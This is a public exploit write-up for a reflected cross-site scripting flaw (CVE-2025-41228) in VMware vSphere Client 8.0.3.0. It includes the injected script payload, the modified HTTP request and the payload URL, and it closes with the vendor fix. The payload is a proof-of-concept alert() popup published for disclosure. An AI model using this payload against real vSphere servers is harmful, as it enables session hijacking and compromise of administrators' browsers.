VMware vSphere Client 8.0.3.0 - Reflected Cross-Site Scripting (XSS)

# VMware vSphere Client 8.0.3.0 - Reflected Cross-Site Scripting (XSS)

- **Exploit Title**: VMware vSphere Client 8.0.3.0 - Reflected Cross-Site Scripting (XSS)
- **Date**: 2025-08-08
- **Exploit Author**: Imraan Khan (Lich-Sec)
- **Vendor Homepage**: [https://www.vmware.com](https://www.vmware.com)
- **Version**: vSphere Client 8.0.3.0
- **Tested On**: Web interface (Chrome 138)
- **CVE**: CVE-2025-41228
- **Category**: WebApps

---

## Description

A reflected Cross-Site Scripting (XSS) vulnerability exists in VMware vSphere Client version 8.0.3.0. The application fails to sanitize input passed via a query string to the `/folder` endpoint, resulting in arbitrary JavaScript execution when the reflected value is rendered into an HTML form’s `action` attribute.

The vulnerability was confirmed by intercepting a request through Burp Suite and injecting a malicious payload. This XSS only successfully executes when the response is rendered by a browser within an **active session**, such as one initiated via prior authentication.

---

## Steps to Reproduce

### 1. Initiate request to vulnerable endpoint

Open a browser and navigate to:

```
https://host/folder?ht7j4
```

This sends a benign request that you will intercept.

---

### 2. Intercept and modify the request using Burp Suite

With Burp Suite proxy enabled, capture the request and modify the query string to inject the XSS payload:

```
GET /folder?ht7j4"><script>alert('ThisIsAnXSSBug')</script>tnkav=1 HTTP/2
Host: 192.168.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Referer: https://192.168.x.x/
Accept: text/html,application/xhtml+xml
```

Then forward the request to the server.

---

### 3. Observe the reflected payload in the HTTP response

In the Burp HTTP Response, the payload appears unencoded within the HTML:

```html
<form action="/folder?ht7j4"><script>alert('ThisIsAnXSSBug')</script>tnkav=1" method="POST">
  <input name="VMware-CSRF-Token" type="hidden" value="..." />
```

This confirms that the payload is reflected back into the HTML in a dangerous context — inside a form’s `action` attribute — allowing script execution.

---

### 4. Trigger script execution

Because the XSS is reflected but only renders within the full browser context, to observe the popup:

- Forward the exact same malicious request using Burp **with an authenticated session (cookies included)**.
- OR, use Burp's **"Open in Browser"** feature (with session cookies) to request the full response as a browser would.

Upon rendering the page, the browser will execute the injected `<script>`.

Example payload URL:

```
https://192.168.x.x/folder?ht7j4"><script>alert(1)</script>tnkav=1
```

---

## Impact

Successful exploitation results in arbitrary JavaScript execution within the vSphere Client’s web interface. This could be leveraged for phishing, session hijacking, or further compromise of the admin's browser session.

---

## Recommendation

Upgrade to VMware vCenter Server version **8.0 U3e or later**, which remediates **CVE-2025-41228**.

---

## References

- https://nvd.nist.gov/vuln/detail/CVE-2025-41228
- https://www.vmware.com/security/advisories